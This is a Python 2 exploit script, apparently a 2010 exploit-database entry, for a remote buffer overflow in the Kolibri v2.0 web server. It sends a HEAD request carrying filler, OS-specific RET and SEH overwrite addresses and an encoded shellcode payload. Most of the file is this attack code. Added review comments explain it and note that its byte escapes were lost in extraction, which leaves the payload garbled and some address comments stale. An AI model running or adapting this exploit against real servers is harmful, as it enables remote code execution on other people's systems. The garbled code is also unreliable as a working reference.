# Title : Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD)
# Published : 2010-12-26
# Author : TheLeader
#!/usr/bin/env python
# _ ____ __ __ ___
# (_)____ _ __/ __ / /_____ ____/ / _/_/ |
# / // __ | / / / / / //_/ _ / __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/____/_/|_|___/__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader (gsog2009 [a7] homtail [d0t] com)
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# Bug discovered by Pr0T3cT10n
# Exploited by TheLeader, Debug
# -----------------------------------
# Description:
#
# Kolibri v2.0 is vulnerable to a remote buffer overflow attack.
# By sending a malformed HEAD request, we are able to overwrite both the return address and an SEH handler.
# Null bytes terminate the request though, but we are able to partially overwrite with a pointer to
# a POP + POP + RET instruction inside kolibri.exe and gain control over the execution via SEH.
# This although gets complicated because the SEH handler offset between XP/2K3 and Vista/W7 is different
# by 2 bytes (probably due to local stack variables), thus we are able to cover only 2 operating systems with the SEH overwrite exploit.
#
# In order to successfully exploit the RET overwrite, we need to either overwrite ret with jmp to the stack
# and then overwrite the stack with our shellcode, or find another way to get to our shellcode. Since null
# terminates the request string, it is impossible to partially overwrite RET with an address from the binary
# and then overwrite with shellcode. We attempted finding another reliable way to get to our shellcode but haven't succeeded.
# The most reasonable option left is to overwrite RET with an OS specific address from a DLL that gets loaded by Kolibri.
# -----------------------------------
#
# Exploit Title: Kolibri v2.0 Buffer Overflow RET + SEH exploit (HEAD)
# Date: 24/12/2010
# Author: TheLeader
# Affected Version: Kolibri-2.0
# Tested on: Windows 7 x86 ENG/HEB , Windows Server 2003 SP2 ENG, Windows XP SP3 ENG
# ISRAEL, NULLBYTE.ORG.IL
import socket
import sys
# Python 2 script (print statements, str-typed socket payload). There are
# no functions: everything below runs top to bottom when the file is
# executed.
print "n Kolibri v2.0 Buffer Overflow RET + SEH exploit"
# Usage text. `mode` picks one of four RET-address / SEH-offset pairs; the
# mapping is implemented in the if/elif chain further down.
usage = (
    " Usage: kexploit.py host port [mode]nn"
    " Modes:n"
    " 1 - RET = XP SP3 ENG, SEH = VISTA + WIN7 (default)n"
    " 2 - RET = SERVER2003 SP2 ENG, SEH = VISTA + WIN7n"
    " 3 - RET = XP SP3 ENG, SEH = XP + SERVER2003n"
    " 4 - RET = SERVER2003 SP2 ENG, SEH = XP + SERVER2003n"
)
# Argument handling: host and port are mandatory, mode is optional and
# defaults to 1. Non-numeric port/mode exit with status 1; too few
# arguments print the usage and exit with status 0.
if len(sys.argv) < 3:
    print usage
    sys.exit(0)
host = sys.argv[1]
try:
    port = int(sys.argv[2])
except ValueError:
    print " [-] Error: port must be numeric!"
    sys.exit(1)
if len(sys.argv) > 3:
    try:
        mode = int(sys.argv[3])
    except ValueError:
        print " [-] Error: mode must be numeric!"
        sys.exit(1)
else:
    mode = 1
# Offsets (in bytes of the request path) at which, per the header comment,
# the saved return address and the SEH record are reached; the two SEH
# offsets differ by 2 bytes between the OS families.
# NOTE(review): as rendered on this page every `xNN` token is three literal
# characters, not one byte (the escape backslashes appear to have been
# lost in extraction), so the string lengths computed below no longer line
# up with these offsets.
# ret offsets = 213, 515
ret_offset = 515
seh_offset_xp_2k3 = 792 # WINXP / WS2K3
seh_offset_vista_7 = 794 # VISTA / WIN7
# Byte values the author lists as unusable in the request (0x00 terminates
# the request string per the header; the others are HTTP request-line
# delimiters).
# badchars = [0x00, 0x0d, 0x0a, 0x20, 0x3d, 0x3f]
# Opaque encoded payload. Nothing on this page documents what it does or
# how it was produced.
shellcode = (
    "xb8xe2x96x27xb0x33xc9xdaxdexd9x74x24xf4x5b"
    "xb1x32x31x43x10x83xebxfcx03xa1x9axc5x45xd9"
    "x4bx80xa6x21x8cxf3x2fxc4xbdx21x4bx8dxecxf5"
    "x1fxc3x1cx7dx4dxf7x97xf3x5axf8x10xb9xbcx37"
    "xa0x0fx01x9bx62x11xfdxe1xb6xf1x3cx2axcbxf0"
    "x79x56x24xa0xd2x1dx97x55x56x63x24x57xb8xe8"
    "x14x2fxbdx2exe0x85xbcx7ex59x91xf7x66xd1xfd"
    "x27x97x36x1ex1bxdex33xd5xefxe1x95x27x0fxd0"
    "xd9xe4x2exddxd7xf5x77xd9x07x80x83x1axb5x93"
    "x57x61x61x11x4axc1xe2x81xaexf0x27x57x24xfe"
    "x8cx13x62xe2x13xf7x18x1ex9fxf6xcex97xdbxdc"
    "xcaxfcxb8x7dx4ax58x6ex81x8cx04xcfx27xc6xa6"
    "x04x51x85xacxdbxd3xb3x89xdcxebxbbxb9xb4xda"
    "x30x56xc2xe2x92x13x3cxa9xbfx35xd5x74x2ax04"
    "xb8x86x80x4axc5x04x21x32x32x14x40x37x7ex92"
    "xb8x45xefx77xbfxfax10x52xdcx9dx82x3ex23")
# OS/service-pack specific RET overwrite values. The header explains why
# these have to come from a system DLL rather than from kolibri.exe, which
# is also why the script only works on the exact builds listed there.
ret_xp_sp3 = "x13x44x87x7C" # 0x7C874413 WINXP SP3 JMP ESP @ kernel32.dll
ret_2k3_sp2 = "xC3x3BxF7x76" # 0x76F73BC3 WS2K3 SP2 JMP ESP @ winrnr.dll
# Mode dispatch. A mode outside 1-4 matches no branch and leaves `ret` and
# `seh_offset` unassigned, so the concatenation further down raises
# NameError rather than a usage error. The `ret = ret = ...` in mode 4 is a
# harmless double assignment.
if mode == 1:
    ret = ret_xp_sp3
    seh_offset = seh_offset_vista_7
elif mode == 2:
    ret = ret_2k3_sp2
    seh_offset = seh_offset_vista_7
elif mode == 3:
    ret = ret_xp_sp3
    seh_offset = seh_offset_xp_2k3
elif mode == 4:
    ret = ret = ret_2k3_sp2
    seh_offset = seh_offset_xp_2k3
# NOTE(review): the address quoted in this trailing comment (0x0045586B)
# does not correspond to the three bytes in the literal; one of the two is
# stale. Only three bytes are given because, per the header, the fourth
# (0x00) is supplied by the request terminator.
seh = "x67x1ax48" # 0x0045586B @ kolibri.exe POP + POP + RET
nseh="x90x90xebxf7"
jmp_back2 = "xE9x12xFFxFFxFF"
# Filler up to the RET slot, then padding sized so the SEH record lands at
# seh_offset. If the pieces already exceed seh_offset the multiplier is
# negative and `nops` is simply empty (Python does not raise on that).
buf = "x41" * (ret_offset)
nops = "x90" * (seh_offset - len(buf + ret + shellcode + jmp_back2 + nseh))
# The whole overflow rides in the request line of an otherwise ordinary
# HEAD request; the remaining headers mimic a Firefox 3.6 browser. From a
# detection standpoint the observable artefact is a request line many
# hundreds of bytes long made up mostly of repeated 0x41/0x90 filler; a
# front-end limit on request-line length would likely reject it before the
# server ever parses the path.
req = ("HEAD /" + buf + ret + nops + shellcode + jmp_back2 + nseh + seh + " HTTP/1.1rn"
       "Host: " + host + ":" + str(port) + "rn"
       "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12rn"
       "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
       "Accept-Language: he,en-us;q=0.7,en;q=0.3rn"
       "Accept-Encoding: gzip,deflatern"
       "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7rn"
       "Keep-Alive: 115rn"
       "Connection: keep-alivernrn")
# One plain TCP connection: send the request once, read a single response
# chunk (never inspected), close. No timeout is set on the socket, so a
# host that accepts the connection but never answers blocks recv() for
# good; connect() failures propagate as an uncaught socket.error.
print " [+] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print " [+] Sending payload.."
s.send(req)
data = s.recv(1024)
print " [+] Closing connection.."
s.close()
print " [+] Done!"